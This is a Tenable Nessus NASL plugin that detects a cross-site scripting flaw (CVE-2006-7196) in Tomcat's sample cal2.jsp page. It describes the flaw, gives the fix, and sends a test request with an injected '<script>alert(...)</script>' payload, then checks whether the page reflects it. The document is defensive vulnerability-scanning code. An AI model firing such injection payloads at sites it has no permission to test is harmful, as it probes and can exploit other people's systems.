#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(26070);
  script_version("$Revision: 1.1 $");

  script_cve_id("CVE-2006-7196");
  script_bugtraq_id(25531);

  script_name(english:"Tomcat cal2.jsp Sample App Cross-Site Scripting Vulnerability");
  script_summary(english:"Checks for an XSS flaw in Tomcat's cal2.jsp");

  desc = "
Synopsis :

The remote web server contains a JSP application that is affected by a
cross-site scripting vulnerability. 

Description :

The remote web server includes an example JSP application, 'cal2.jsp',
that fails to sanitize user-supplied input before using it to generate
dynamic content.  An unauthenticated remote attacker may be able to
leverage this issue to inject arbitrary HTML or script code into a
user's browser to be executed within the security context of the
affected site. 

See also :

http://www.securityfocus.com/archive/1/478491/30/0/threaded
http://www.securityfocus.com/archive/1/478609/30/0/threaded

Solution :

Either undeploy the Tomcat examples web application or upgrade to
Tomcat 4.1.32 / 5.5.16 or later. 

Risk factor :

Medium / CVSS Base Score : 4.3
(CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
  script_require_ports("Services/www", 8080);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_kb_item("Services/www");
if (!port) port = 8080;
if (!get_port_state(port)) exit(0);
if (get_kb_item("www/"+port+"/generic_xss")) exit(0);


# Unless we're paranoid, make sure the banner looks like Tomcat.
if (report_paranoia < 2)
{
  banner = get_http_banner(port:port);
  if (!banner || "Server: Apache-Coyote" >!< banner) exit(0);
}


# Send a request to exploit the flaw.
time = "8am";
xss = raw_string("<script>alert(", SCRIPT_NAME, ")</script>");

foreach dir (make_list("/examples/jsp", "/jsp-examples"))
{
  req = http_get(
    item:string(
      dir, "/cal/cal2.jsp?",
      "time=", time, urlencode(str:xss)
    ), 
    port:port  
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if our exploit appears along with the time in a form.
  if (
    "METHOD=POST ACTION=cal1.jsp" >< res &&
    string('INPUT NAME="time" TYPE=HIDDEN VALUE=',time, xss) >< res
  ) security_warning(port);
}
